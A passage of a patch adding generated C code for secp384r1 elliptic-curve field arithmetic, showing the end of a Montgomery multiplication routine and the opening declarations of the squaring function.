&x1557, x1555, x1484, x1531); ++ fiat_secp384r1_addcarryx_u32(&x1558, &x1559, x1557, x1486, x1533); ++ fiat_secp384r1_addcarryx_u32(&x1560, &x1561, x1559, x1488, x1535); ++ fiat_secp384r1_addcarryx_u32(&x1562, &x1563, x1561, x1490, x1537); ++ fiat_secp384r1_addcarryx_u32(&x1564, &x1565, x1563, x1492, x1539); ++ fiat_secp384r1_mulx_u32(&x1566, &x1567, x1540, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1568, &x1569, x1540, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1570, &x1571, x1540, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1572, &x1573, x1540, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1574, &x1575, x1540, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1576, &x1577, x1540, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1578, &x1579, x1540, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1580, &x1581, x1540, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x1582, &x1583, x1540, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1584, &x1585, x1540, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u32(&x1586, &x1587, 0x0, x1583, x1580); ++ fiat_secp384r1_addcarryx_u32(&x1588, &x1589, x1587, x1581, x1578); ++ fiat_secp384r1_addcarryx_u32(&x1590, &x1591, x1589, x1579, x1576); ++ fiat_secp384r1_addcarryx_u32(&x1592, &x1593, x1591, x1577, x1574); ++ fiat_secp384r1_addcarryx_u32(&x1594, &x1595, x1593, x1575, x1572); ++ fiat_secp384r1_addcarryx_u32(&x1596, &x1597, x1595, x1573, x1570); ++ fiat_secp384r1_addcarryx_u32(&x1598, &x1599, x1597, x1571, x1568); ++ fiat_secp384r1_addcarryx_u32(&x1600, &x1601, x1599, x1569, x1566); ++ x1602 = (x1601 + x1567); ++ fiat_secp384r1_addcarryx_u32(&x1603, &x1604, 0x0, x1540, x1584); ++ fiat_secp384r1_addcarryx_u32(&x1605, &x1606, x1604, x1542, x1585); ++ fiat_secp384r1_addcarryx_u32(&x1607, &x1608, x1606, x1544, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x1609, &x1610, x1608, x1546, x1582); ++ fiat_secp384r1_addcarryx_u32(&x1611, &x1612, x1610, x1548, x1586); ++ fiat_secp384r1_addcarryx_u32(&x1613, &x1614, x1612, x1550, x1588); ++ fiat_secp384r1_addcarryx_u32(&x1615, &x1616, x1614, x1552, x1590); ++ fiat_secp384r1_addcarryx_u32(&x1617, &x1618, x1616, x1554, x1592); ++ fiat_secp384r1_addcarryx_u32(&x1619, &x1620, x1618, x1556, x1594); ++ fiat_secp384r1_addcarryx_u32(&x1621, &x1622, x1620, x1558, x1596); ++ fiat_secp384r1_addcarryx_u32(&x1623, &x1624, x1622, x1560, x1598); ++ fiat_secp384r1_addcarryx_u32(&x1625, &x1626, x1624, x1562, x1600); ++ fiat_secp384r1_addcarryx_u32(&x1627, &x1628, x1626, x1564, x1602); ++ x1629 = ((uint32_t)x1628 + x1565); ++ fiat_secp384r1_subborrowx_u32(&x1630, &x1631, 0x0, x1605, ++ UINT32_C(0xffffffff)); ++ fiat_secp384r1_subborrowx_u32(&x1632, &x1633, x1631, x1607, 0x0); ++ fiat_secp384r1_subborrowx_u32(&x1634, &x1635, x1633, x1609, 0x0); ++ fiat_secp384r1_subborrowx_u32(&x1636, &x1637, x1635, x1611, ++ UINT32_C(0xffffffff)); ++ fiat_secp384r1_subborrowx_u32(&x1638, &x1639, x1637, x1613, ++ UINT32_C(0xfffffffe)); ++ fiat_secp384r1_subborrowx_u32(&x1640, &x1641, x1639, x1615, ++ UINT32_C(0xffffffff)); ++ fiat_secp384r1_subborrowx_u32(&x1642, &x1643, x1641, x1617, ++ UINT32_C(0xffffffff)); ++ fiat_secp384r1_subborrowx_u32(&x1644, &x1645, x1643, x1619, ++ UINT32_C(0xffffffff)); ++ fiat_secp384r1_subborrowx_u32(&x1646, &x1647, x1645, x1621, ++ UINT32_C(0xffffffff)); ++ fiat_secp384r1_subborrowx_u32(&x1648, &x1649, x1647, x1623, ++ UINT32_C(0xffffffff)); ++ fiat_secp384r1_subborrowx_u32(&x1650, &x1651, x1649, x1625, ++ UINT32_C(0xffffffff)); ++ fiat_secp384r1_subborrowx_u32(&x1652, &x1653, x1651, x1627, ++ UINT32_C(0xffffffff)); ++ fiat_secp384r1_subborrowx_u32(&x1654, &x1655, x1653, x1629, 0x0); ++ fiat_secp384r1_cmovznz_u32(&x1656, x1655, x1630, x1605); ++ fiat_secp384r1_cmovznz_u32(&x1657, x1655, x1632, x1607); ++ fiat_secp384r1_cmovznz_u32(&x1658, x1655, x1634, x1609); ++ fiat_secp384r1_cmovznz_u32(&x1659, x1655, x1636, x1611); ++ fiat_secp384r1_cmovznz_u32(&x1660, x1655, x1638, x1613); ++ fiat_secp384r1_cmovznz_u32(&x1661, x1655, x1640, x1615); ++ fiat_secp384r1_cmovznz_u32(&x1662, x1655, x1642, x1617); ++ fiat_secp384r1_cmovznz_u32(&x1663, x1655, x1644, x1619); ++ fiat_secp384r1_cmovznz_u32(&x1664, x1655, x1646, x1621); ++ fiat_secp384r1_cmovznz_u32(&x1665, x1655, x1648, x1623); ++ fiat_secp384r1_cmovznz_u32(&x1666, x1655, x1650, x1625); ++ fiat_secp384r1_cmovznz_u32(&x1667, x1655, x1652, x1627); ++ out1[0] = x1656; ++ out1[1] = x1657; ++ out1[2] = x1658; ++ out1[3] = x1659; ++ out1[4] = x1660; ++ out1[5] = x1661; ++ out1[6] = x1662; ++ out1[7] = x1663; ++ out1[8] = x1664; ++ out1[9] = x1665; ++ out1[10] = x1666; ++ out1[11] = x1667; ++} ++ ++/* ++ * The function fiat_secp384r1_square squares a field element in the Montgomery domain. ++ * Preconditions: ++ * 0 ≤ eval arg1 < m ++ * Postconditions: ++ * eval (from_montgomery out1) mod m = (eval (from_montgomery arg1) * eval (from_montgomery arg1)) mod m ++ * 0 ≤ eval out1 < m ++ * ++ * Input Bounds: ++ * arg1: [[0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff]] ++ * Output Bounds: ++ * out1: [[0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff]] ++ */ ++static void ++fiat_secp384r1_square(uint32_t out1[12], const uint32_t arg1[12]) ++{ ++ uint32_t x1; ++ uint32_t x2; ++ uint32_t x3; ++ uint32_t x4; ++ uint32_t x5; ++ uint32_t x6; ++ uint32_t x7; ++ uint32_t x8; ++ uint32_t x9; ++ uint32_t x10; ++ uint32_t x11; ++ uint32_t x12; ++ uint32_t x13; ++ uint32_t x14; ++ uint32_t x15; ++ uint32_t x16; ++ uint32_t x17; ++ uint32_t x18; ++ uint32_t x19; ++ uint32_t x20; ++ uint32_t x21; ++ uint32_t x22; ++ uint32_t x23; ++ uint32_t x24; ++ uint32_t x25; ++ uint32_t x26; ++ uint32_t x27; ++ uint32_t x28; ++ uint32_t x29; ++ uint32_t x30; ++ uint32_t x31; ++ uint32_t x32; ++ uint32_t x33; ++ uint32_t x34; ++ uint32_t x35; ++ uint32_t x36; ++ uint32_t x37; ++ fiat_secp384r1_uint1 x38; ++ uint32_t x39; ++ fiat_secp384r1_uint1 x40; ++ uint32_t x41; ++ fiat_secp384r1_uint1 x42; ++ uint32_t x43; ++ fiat_secp384r1_uint1 x44; ++ uint32_t x45; ++ fiat_secp384r1_uint1 x46; ++ uint32_t x47; ++ fiat_secp384r1_uint1 x48; ++ uint32_t x49; ++ fiat_secp384r1_uint1 x50; ++ uint32_t x51; ++ fiat_secp384r1_uint1 x52; ++ uint32_t x53; ++ fiat_secp384r1_uint1 x54; ++ uint32_t x55; ++ fiat_secp384r1_uint1 x56; ++ uint32_t x57; ++ fiat_secp384r1_uint1 x58; ++ uint32_t x59; ++ uint32_t x60; ++ uint32_t x61; ++ uint32_t x62; ++ uint32_t x63; ++ uint32_t x64; ++ uint32_t x65; ++ uint32_t x66; ++ uint32_t x67; ++ uint32_t x68; ++ uint32_t x69; ++ uint32_t x70; ++ uint32_t x71; ++ uint32_t x72; ++ uint32_t x73; ++ uint32_t x74; ++ uint32_t x75; ++ uint32_t x76; ++ uint32_t x77; ++ uint32_t x78; ++ uint32_t x79; ++ uint32_t x80; ++ fiat_secp384r1_uint1 x81; ++ uint32_t x82; ++ fiat_secp384r1_uint1 x83; ++ uint32_t x84; ++ fiat_secp384r1_uint1 x85; ++ uint32_t x86; ++ fiat_secp384r1_uint1 x87; ++ uint32_t x88; ++ fiat_secp384r1_uint1 x89; ++ uint32_t x90; ++ fiat_secp384r1_uint1 x91; ++ uint32_t x92; ++ fiat_secp384r1_uint1 x93; ++ uint32_t x94; ++ fiat_secp384r1_uint1 x95; ++ uint32_t x96; ++ uint32_t x97; ++ fiat_secp384r1_uint1 x98; ++ uint32_t x99; ++ fiat_secp384r1_uint1 x100; ++ uint32_t x101; ++ fiat_secp384r1_uint1 x102; ++ uint32_t x103; ++ fiat_secp384r1_uint1 x104; ++ uint32_t x105; ++ fiat_secp384r1_uint1 x106; ++ uint32_t x107; ++ fiat_secp384r1_uint1 x108; ++ uint32_t x109; ++ fiat_secp384r1_uint1 x110; ++ uint32_t x111; ++ fiat_secp384r1_uint1 x112; ++ uint32_t x113; ++ fiat_secp384r1_uint1 x114; ++ uint32_t x115; ++ fiat_secp384r1_uint1 x116; ++ uint32_t x117; ++ fiat_secp384r1_uint1 x118; ++ uint32_t x119; ++ fiat_secp384r1_uint1 x120; ++ uint32_t x121; ++ fiat_secp384r1_uint1 x122; ++ uint32_t x123; ++ uint32_t x124; ++ uint32_t x125; ++ uint32_t x126; ++ uint32_t x127; ++ uint32_t x128; ++ uint32_t x129; ++ uint32_t x130; ++ uint32_t x131; ++ uint32_t x132; ++ uint32_t x133; ++ uint32_t x134; ++ uint32_t x135; ++ uint32_t x136; ++ uint32_t x137; ++ uint32_t x138; ++ uint32_t x139; ++ uint32_t x140; ++ uint32_t x141; ++ uint32_t x142; ++ uint32_t x143; ++ uint32_t x144; ++ uint32_t x145; ++ uint32_t x146; ++ uint32_t x147; ++ fiat_secp384r1_uint1 x148; ++ uint32_t x149; ++ fiat_secp384r1_uint1 x150; ++ uint32_t x151; ++ fiat_secp384r1_uint1 x152; ++ uint32_t x153; ++ fiat_secp384r1_uint1 x154; ++ uint32_t x155; ++ fiat_secp384r1_uint1 x156; ++ uint32_t x157; ++ fiat_secp384r1_uint1 x158; ++ uint32_t x159; ++ fiat_secp384r1_uint1 x160; ++ uint32_t x161; ++ fiat_secp384r1_uint1 x162; ++ uint32_t x163; ++ fiat_secp384r1_uint1 x164; ++ uint32_t x165; ++ fiat_secp384r1_uint1 x166; ++ uint32_t x167; ++ fiat_secp384r1_uint1 x168; ++ uint32_t x169; ++ uint32_t x170; ++ fiat_secp384r1_uint1 x171; ++ uint32_t x172; ++ fiat_secp384r1_uint1 x173; ++ uint32_t x174; ++ fiat_secp384r1_uint1 x175; ++ uint32_t x176; ++ fiat_secp384r1_uint1 x177; ++ uint32_t x178; ++ fiat_secp384r1_uint1 x179; ++ uint32_t x180; ++ fiat_secp384r1_uint1 x181; ++ uint32_t x182; ++ fiat_secp384r1_uint1 x183; ++ uint32_t x184; ++ fiat_secp384r1_uint1 x185; ++ uint32_t x186; ++ fiat_secp384r1_uint1 x187; ++ uint32_t x188; ++ fiat_secp384r1_uint1 x189; ++ uint32_t x190; ++ fiat_secp384r1_uint1 x191; ++ uint32_t x192; ++ fiat_secp384r1_uint1 x193; ++ uint32_t x194; ++ fiat_secp384r1_uint1 x195; ++ uint32_t x196; ++ uint32_t x197; ++ uint32_t x198; ++ uint32_t x199; ++ uint32_t x200; ++ uint32_t x201; ++ uint32_t x202; ++ uint32_t x203; ++ uint32_t x204; ++ uint32_t x205; ++ uint32_t x206; ++ uint32_t x207; ++ uint32_t x208; ++ uint32_t x209; ++ uint32_t x210; ++ uint32_t x211; ++ uint32_t x212; ++ uint32_t x213; ++ uint32_t x214; ++ uint32_t x215; ++ uint32_t x216; ++ fiat_secp384r1_uint1 x217; ++ uint32_t x218; ++ fiat_secp384r1_uint1 x219; ++ uint32_t x220; ++ fiat_secp384r1_uint1 x221; ++ uint32_t x222; ++ fiat_secp384r1_uint1 x223; ++ uint32_t x224; ++ fiat_secp384r1_uint1 x225; ++ uint32_t x226; ++ fiat_secp384r1_uint1 x227; ++ uint32_t x228; ++ fiat_secp384r1_uint1 x229; ++ uint32_t x230; ++ fiat_secp384r1_uint1 x231; ++ uint32_t x232; ++ uint32_t x233; ++ fiat_secp384r1_uint1 x234; ++ uint32_t x235; ++ fiat_secp384r1_uint1 x236; ++ uint32_t x237; ++ fiat_secp384r1_uint1 x238; ++ uint32_t x239; ++ fiat_secp384r1_uint1 x240; ++ uint32_t x241; ++ fiat_secp384r1_uint1 x242; ++ uint32_t x243; ++ fiat_secp384r1_uint1 x244; ++ uint32_t x245; ++ fiat_secp384r1_uint1 x246; ++ uint32_t x247; ++ fiat_secp384r1_uint1 x248; ++ uint32_t x249; ++ fiat_secp384r1_uint1 x250; ++ uint32_t x251; ++ fiat_secp384r1_uint1 x252; ++ uint32_t x253; ++ fiat_secp384r1_uint1 x254; ++ uint32_t x255; ++ fiat_secp384r1_uint1 x256; ++ uint32_t x257; ++ fiat_secp384r1_uint1 x258; ++ uint32_t x259; ++ uint32_t x260; ++ uint32_t x261; ++ uint32_t x262; ++ uint32_t x263; ++ uint32_t x264; ++ uint32_t x265; ++ uint32_t x266; ++ uint32_t x267; ++ uint32_t x268; ++ uint32_t x269; ++ uint32_t x270; ++ uint32_t x271; ++ uint32_t x272; ++ uint32_t x273; ++ uint32_t x274; ++ uint32_t x275; ++ uint32_t x276; ++ uint32_t x277; ++ uint32_t x278; ++ uint32_t x279; ++ uint32_t x280; ++ uint32_t x281; ++ uint32_t x282; ++ uint32_t x283; ++ uint32_t x284; ++ fiat_secp384r1_uint1 x285; ++ uint32_t x286; ++ fiat_secp384r1_uint1 x287; ++ uint32_t x288; ++ fiat_secp384r1_uint1 x289; ++ uint32_t x290; ++ fiat_secp384r1_uint1 x291; ++ uint32_t x292; ++ fiat_secp384r1_uint1 x293; ++ uint32_t x294; ++ fiat_secp384r1_uint1 x295; ++ uint32_t x296; ++ fiat_secp384r1_uint1 x297; ++ uint32_t x298; ++ fiat_secp384r1_uint1 x299; ++ uint32_t x300; ++ fiat_secp384r1_uint1 x301; ++ uint32_t x302; ++ fiat_secp384r1_uint1 x303; ++ uint32_t x304; ++ fiat_secp384r1_uint1 x305; ++ uint32_t x306; ++ uint32_t x307; ++ fiat_secp384r1_uint1 x308; ++ uint32_t x309; ++ fiat_secp384r1_uint1 x310; ++ uint32_t x311; ++ fiat_secp384r1_uint1 x312; ++ uint32_t x313; ++ fiat_secp384r1_uint1 x314; ++ uint32_t x315; ++ fiat_secp384r1_uint1 x316; ++ uint32_t x317; ++ fiat_secp384r1_uint1 x318; ++ uint32_t x319; ++ fiat_secp384r1_uint1 x320; ++ uint32_t x321; ++ fiat_secp384r1_uint1 x322; ++ uint32_t x323; ++ fiat_secp384r1_uint1 x324; ++ uint32_t x325; ++ fiat_secp384r1_uint1 x326; ++ uint32_t x327; ++ fiat_secp384r1_uint1 x328; ++ uint32_t x329; ++ fiat_secp384r1_uint1 x330; ++ uint32_t x331; ++ fiat_secp384r1_uint1 x332; ++ uint32_t x333; ++ uint32_t x334; ++ uint32_t x335; ++ uint32_t x336; ++ uint32_t x337; ++ uint32_t x338; ++ uint32_t x339; ++ uint32_t x340; ++ uint32_t x341; ++ uint32_t x342; ++ uint32_t x343; ++ uint32_t x344; ++ uint32_t x345; ++ uint32_t x346; ++ uint32_t x347; ++ uint32_t x348; ++ uint32_t x349; ++ uint32_t x350; ++ uint32_t x351; ++ uint32_t x352; ++ uint32_t x353; ++ fiat_secp384r1_uint1 x354; ++ uint32_t x355; ++ fiat_secp384r1_uint1 x356; ++ uint32_t x357; ++ fiat_secp384r1_uint1 x358; ++ uint32_t x359; ++ fiat_secp384r1_uint1 x360; ++ uint32_t x361; ++ fiat_secp384r1_uint1 x362; ++ uint32_t x363; ++ fiat_secp384r1_uint1 x364; ++ uint32_t x365; ++ fiat_secp384r1_uint1 x366; ++ uint32_t x367; ++ fiat_secp384r1_uint1 x368; ++ uint32_t x369; ++ uint32_t x370; ++ fiat_secp384r1_uint1 x371; ++ uint32_t x372; ++ fiat_secp384r1_uint1 x373; ++ uint32_t x374; ++ fiat_secp384r1_uint1 x375; ++ uint32_t x376; ++ fiat_secp384r1_uint1 x377; ++ uint32_t x378; ++ fiat_secp384r1_uint1 x379; ++ uint32_t x380; ++ fiat_secp384r1_uint1 x381; ++ uint32_t x382; ++ fiat_secp384r1_uint1 x383; ++ uint32_t x384; ++ fiat_secp384r1_uint1 x385; ++ uint32_t x386; ++ fiat_secp384r1_uint1 x387; ++ uint32_t x388; ++ fiat_secp384r1_uint1 x389; ++ uint32_t x390; ++ fiat_secp384r1_uint1 x391; ++ uint32_t x392; ++ fiat_secp384r1_uint1 x393; ++ uint32_t x394; ++ fiat_secp384r1_uint1 x395; ++ uint32_t x396; ++ uint32_t x397; ++ uint32_t x398; ++ uint32_t x399; ++ uint32_t x400; ++ uint32_t x401; ++ uint32_t x402; ++ uint32_t x403; ++ uint32_t x404; ++ uint32_t x405; ++ uint32_t x406; ++ uint32_t x407; ++ uint32_t x408; ++ uint32_t x409; ++ uint32_t x410; ++ uint32_t x411; ++ uint32_t x412; ++ uint32_t x413; ++ uint32_t x414; ++ uint32_t x415; ++ uint32_t x416; ++ uint32_t x417; ++ uint32_t x418; ++ uint32_t x419; ++ uint32_t x420; ++ uint32_t x421; ++ fiat_secp384r1_uint1 x422; ++ uint32_t x423; ++ fiat_secp384r1_uint1 x424; ++ uint32_t x425; ++ fiat_secp384r1_uint1 x426; ++ uint32_t x427; ++ fiat_secp384r1_uint1 x428; ++ uint32_t x429; ++ fiat_secp384r1_uint1 x430; ++ uint32_t x431; ++ fiat_secp384r1_uint1 x432; ++ uint32_t x433; ++ fiat_secp384r1_uint1 x434; ++ uint32_t x435; ++ fiat_secp384r1_uint1 x436; ++ uint32_t x437; ++ fiat_secp384r1_uint1 x438; ++ uint32_t x439; ++ fiat_secp384r1_uint1 x440; ++ uint32_t x441; ++ fiat_secp384r1_uint1 x442; ++ uint32_t x443; ++ uint32_t x444; ++ fiat_secp384r1_uint1 x445; ++ uint32_t x446; ++ fiat_secp384r1_uint1 x447; ++ uint32_t x448; ++ fiat_secp384r1_uint1 x449; ++ uint32_t x450; ++ fiat_secp384r1_uint1 x451; ++ uint32_t x452; ++ fiat_secp384r1_uint1 x453; ++ uint32_t x454; ++ fiat_secp384r1_uint1 x455; ++ uint32_t x456; ++ fiat_secp384r1_uint1 x457; ++ uint32_t x458; ++ fiat_secp384r1_uint1 x459; ++ uint32_t x460; ++ fiat_secp384r1_uint1 x461; ++ uint32_t x462; ++ fiat_secp384r1_uint1 x463; ++ uint32_t x464; ++ fiat_secp384r1_uint1 x465; ++ uint32_t x466; ++ fiat_secp384r1_uint1 x467; ++ uint32_t x468; ++ fiat_secp384r1_uint1 x469; ++ uint32_t x470; ++ uint32_t x471; ++ uint32_t x472; ++ uint32_t x473; ++ uint32_t x474; ++ uint32_t x475; ++ uint32_t x476; ++ uint32_t x477; ++ uint32_t x478; ++ uint32_t x479; ++ uint32_t x480; ++ uint32_t x481; ++ uint32_t x482; ++ uint32_t x483; ++ uint32_t x484; ++ uint32_t x485; ++ uint32_t x486; ++ uint32_t x487; ++ uint32_t x488; ++ uint32_t x489; ++ uint32_t x490; ++ fiat_secp384r1_uint1 x491; ++ uint32_t x492; ++ fiat_secp384r1_uint1 x493; ++ uint32_t x494; ++ fiat_secp384r1_uint1 x495; ++ uint32_t x496; ++ fiat_secp384r1_uint1 x497; ++ uint32_t x498; ++ fiat_secp384r1_uint1 x499; ++ uint32_t x500; ++ fiat_secp384r1_uint1 x501; ++ uint32_t x502; ++ fiat_secp384r1_uint1 x503; ++ uint32_t x504; ++ fiat_secp384r1_uint1 x505; ++ uint32_t x506; ++ uint32_t x507; ++ fiat_secp384r1_uint1 x508; ++ uint32_t x509; ++ fiat_secp384r1_uint1 x510; ++ uint32_t x511; ++ fiat_secp384r1_uint1 x512; ++ uint32_t x513; ++ fiat_secp384r1_uint1 x514; ++ uint32_t x515; ++ fiat_secp384r1_uint1 x516; ++ uint32_t x517; ++ fiat_secp384r1_uint1 x518; ++ uint32_t x519; ++ fiat_secp384r1_uint1 x520; ++ uint32_t x521; ++ fiat_secp384r1_uint1 x522; ++ uint32_t x523; ++ fiat_secp384r1_uint1 x524; ++ uint32_t x525; ++ fiat_secp384r1_uint1 x526; ++ uint32_t x527; ++ fiat_secp384r1_uint1 x528; ++ uint32_t x529; ++ fiat_secp384r1_uint1 x530; ++ uint32_t x531; ++ fiat_secp384r1_uint1 x532; ++ uint32_t x533; ++ uint32_t x534; ++ uint32_t x535; ++ uint32_t x536; ++ uint32_t x537; ++ uint32_t x538; ++ uint32_t x539; ++ uint32_t x540; ++ uint32_t x541; ++ uint32_t x542; ++ uint32_t x543; ++ uint32_t x544; ++ uint32_t x545; ++ uint32_t x546; ++ uint32_t x547; ++ uint32_t x548; ++ uint32_t x549; ++ uint32_t x550; ++ uint32_t x551; ++ uint32_t x552; ++ uint32_t x553; ++ uint32_t x554; ++ uint32_t x555; ++ uint32_t x556; ++ uint32_t x557; ++ uint32_t x558; ++ fiat_secp384r1_uint1 x559; ++ uint32_t x560; ++ fiat_secp384r1_uint1 x561; ++ uint32_t x562; ++ fiat_secp384r1_uint1 x563; ++ uint32_t x564; ++ fiat_secp384r1_uint1 x565; ++ uint32_t x566; ++ fiat_secp384r1_uint1 x567; ++ uint32_t x568; ++ fiat_secp384r1_uint1 x569; ++ uint32_t x570; ++ fiat_secp384r1_uint1 x571; ++ uint32_t x572; ++ fiat_secp384r1_uint1 x573; ++ uint32_t x574; ++ fiat_secp384r1_uint1 x575; ++ uint32_t x576; ++ fiat_secp384r1_uint1 x577; ++ uint32_t x578; ++ fiat_secp384r1_uint1 x579; ++ uint32_t x580; ++ uint32_t x581; ++ fiat_secp384r1_uint1 x582; ++ uint32_t x583; ++ fiat_secp384r1_uint1 x584; ++ uint32_t x585; ++ fiat_secp384r1_uint1 x586; ++ uint32_t x587; ++ fiat_secp384r1_uint1 x588; ++ uint32_t x589; ++ fiat_secp384r1_uint1 x590; ++ uint32_t x591; ++ fiat_secp384r1_uint1 x592; ++ uint32_t x593; ++ fiat_secp384r1_uint1 x594; ++ uint32_t x595; ++ fiat_secp384r1_uint1 x596; ++ uint32_t x597; ++ fiat_secp384r1_uint1 x598; ++ uint32_t x599; ++ fiat_secp384r1_uint1 x600; ++ uint32_t x601; ++ fiat_secp384r1_uint1 x602; ++ uint32_t x603; ++ fiat_secp384r1_uint1 x604; ++ uint32_t x605; ++ fiat_secp384r1_uint1 x606; ++ uint32_t x607; ++ uint32_t x608; ++ uint32_t x609; ++ uint32_t x610; ++ uint32_t x611; ++ uint32_t x612; ++ uint32_t x613; ++ uint32_t x614; ++ uint32_t x615; ++ uint32_t x616; ++ uint32_t x617; ++ uint32_t x618; ++ uint32_t x619; ++ uint32_t x620; ++ uint32_t x621; ++ uint32_t x622; ++ uint32_t x623; ++ uint32_t x624; ++ uint32_t x625; ++ uint32_t x626; ++ uint32_t x627; ++ fiat_secp384r1_uint1 x628; ++ uint32_t x629; ++ fiat_secp384r1_uint1 x630; ++ uint32_t x631; ++ fiat_secp384r1_uint1 x632; ++ uint32_t x633; ++ fiat_secp384r1_uint1 x634; ++ uint32_t x635; ++ fiat_secp384r1_uint1 x636; ++ uint32_t x637; ++ fiat_secp384r1_uint1 x638; ++ uint32_t x639; ++ fiat_secp384r1_uint1 x640; ++ uint32_t x641; ++ fiat_secp384r1_uint1 x642; ++ uint32_t x643; ++ uint32_t x644; ++ fiat_secp384r1_uint1 x645; ++ uint32_t x646; ++ fiat_secp384r1_uint1 x647; ++ uint32_t x648; ++ fiat_secp384r1_uint1 x649; ++ uint32_t x650; ++ fiat_secp384r1_uint1 x651; ++ uint32_t x652; ++ fiat_secp384r1_uint1 x653; ++ uint32_t x654; ++ fiat_secp384r1_uint1 x655; ++ uint32_t x656; ++ fiat_secp384r1_uint1 x657; ++ uint32_t x658; ++ fiat_secp384r1_uint1 x659; ++ uint32_t x660; ++ fiat_secp384r1_uint1 x661; ++ uint32_t x662; ++ fiat_secp384r1_uint1 x663; ++ uint32_t x664; ++ fiat_secp384r1_uint1 x665; ++ uint32_t x666; ++ fiat_secp384r1_uint1 x667; ++ uint32_t x668; ++ fiat_secp384r1_uint1 x669; ++ uint32_t x670; ++ uint32_t x671; ++ uint32_t x672; ++ uint32_t x673; ++ uint32_t x674; ++ uint32_t x675; ++ uint32_t x676; ++ uint32_t x677; ++ uint32_t x678; ++ uint32_t x679; ++ uint32_t x680; ++ uint32_t x681; ++ uint32_t x682; ++ uint32_t x683; ++ uint32_t x684; ++ uint32_t x685; ++ uint32_t x686; ++ uint32_t x687; ++ uint32_t x688; ++ uint32_t x689; ++ uint32_t x690; ++ uint32_t x691; ++ uint32_t x692; ++ uint32_t x693; ++ uint32_t x694; ++ uint32_t x695; ++ fiat_secp384r1_uint1 x696; ++ uint32_t x697; ++ fiat_secp384r1_uint1 x698; ++ uint32_t x699; ++ fiat_secp384r1_uint1 x700; ++ uint32_t x701; ++ fiat_secp384r1_uint1 x702; ++ uint32_t x703; ++ fiat_secp384r1_uint1 x704; ++ uint32_t x705; ++ fiat_secp384r1_uint1 x706; ++ uint32_t x707; ++ fiat_secp384r1_uint1 x708; ++ uint32_t x709; ++ fiat_secp384r1_uint1 x710; ++ uint32_t x711; ++ fiat_secp384r1_uint1 x712; ++ uint32_t x713; ++ fiat_secp384r1_uint1 x714; ++ uint32_t x715; ++ fiat_secp384r1_uint1 x716; ++ uint32_t x717; ++ uint32_t x718; ++ fiat_secp384r1_uint1 x719; ++ uint32_t x720; ++ fiat_secp384r1_uint1 x721; ++ uint32_t x722; ++ fiat_secp384r1_uint1 x723; ++ uint32_t x724; ++ fiat_secp384r1_uint1 x725; ++ uint32_t x726; ++ fiat_secp384r1_uint1 x727; ++ uint32_t x728; ++ fiat_secp384r1_uint1 x729; ++ uint32_t x730; ++ fiat_secp384r1_uint1 x731; ++ uint32_t x732; ++ fiat_secp384r1_uint1 x733; ++ uint32_t x734; ++ fiat_secp384r1_uint1 x735; ++ uint32_t x736; ++ fiat_secp384r1_uint1 x737; ++ uint32_t x738; ++ fiat_secp384r1_uint1 x739; ++ uint32_t x740; ++ fiat_secp384r1_uint1 x741; ++ uint32_t x742; ++ fiat_secp384r1_uint1 x743; ++ uint32_t x744; ++ uint32_t x745; ++ uint32_t x746; ++ uint32_t x747; ++ uint32_t x748; ++ uint32_t x749; ++ uint32_t x750; ++ uint32_t x751; ++ uint32_t x752; ++ uint32_t x753; ++ uint32_t x754; ++ uint32_t x755; ++ uint32_t x756; ++ uint32_t x757; ++ uint32_t x758; ++ uint32_t x759; ++ uint32_t x760; ++ uint32_t x761; ++ uint32_t x762; ++ uint32_t x763; ++ uint32_t x764; ++ fiat_secp384r1_uint1 x765; ++ uint32_t x766; ++ fiat_secp384r1_uint1 x767; ++ uint32_t x768; ++ fiat_secp384r1_uint1 x769; ++ uint32_t x770; ++ fiat_secp384r1_uint1 x771; ++ uint32_t x772; ++ fiat_secp384r1_uint1 x773; ++ uint32_t x774; ++ fiat_secp384r1_uint1 x775; ++ uint32_t x776; ++ fiat_secp384r1_uint1 x777; ++ uint32_t x778; ++ fiat_secp384r1_uint1 x779; ++ uint32_t x780; ++ uint32_t x781; ++ fiat_secp384r1_uint1 x782; ++ uint32_t x783; ++ fiat_secp384r1_uint1 x784; ++ uint32_t x785; ++ fiat_secp384r1_uint1 x786; ++ uint32_t x787; ++ fiat_secp384r1_uint1 x788; ++ uint32_t x789; ++ fiat_secp384r1_uint1 x790; ++ uint32_t x791; ++ fiat_secp384r1_uint1 x792; ++ uint32_t x793; ++ fiat_secp384r1_uint1 x794; ++ uint32_t x795; ++ fiat_secp384r1_uint1 x796; ++ uint32_t x797; ++ fiat_secp384r1_uint1 x798; ++ uint32_t x799; ++ fiat_secp384r1_uint1 x800; ++ uint32_t x801; ++ fiat_secp384r1_uint1 x802; ++ uint32_t x803; ++ fiat_secp384r1_uint1 x804; ++ uint32_t x805; ++ fiat_secp384r1_uint1 x806; ++ uint32_t x807; ++ uint32_t x808; ++ uint32_t x809; ++ uint32_t x810; ++ uint32_t x811; ++ uint32_t x812; ++ uint32_t x813; ++ uint32_t x814; ++ uint32_t x815; ++ uint32_t x816; ++ uint32_t x817; ++ uint32_t x818; ++ uint32_t x819; ++ uint32_t x820; ++ uint32_t x821; ++ uint32_t x822; ++ uint32_t x823; ++ uint32_t 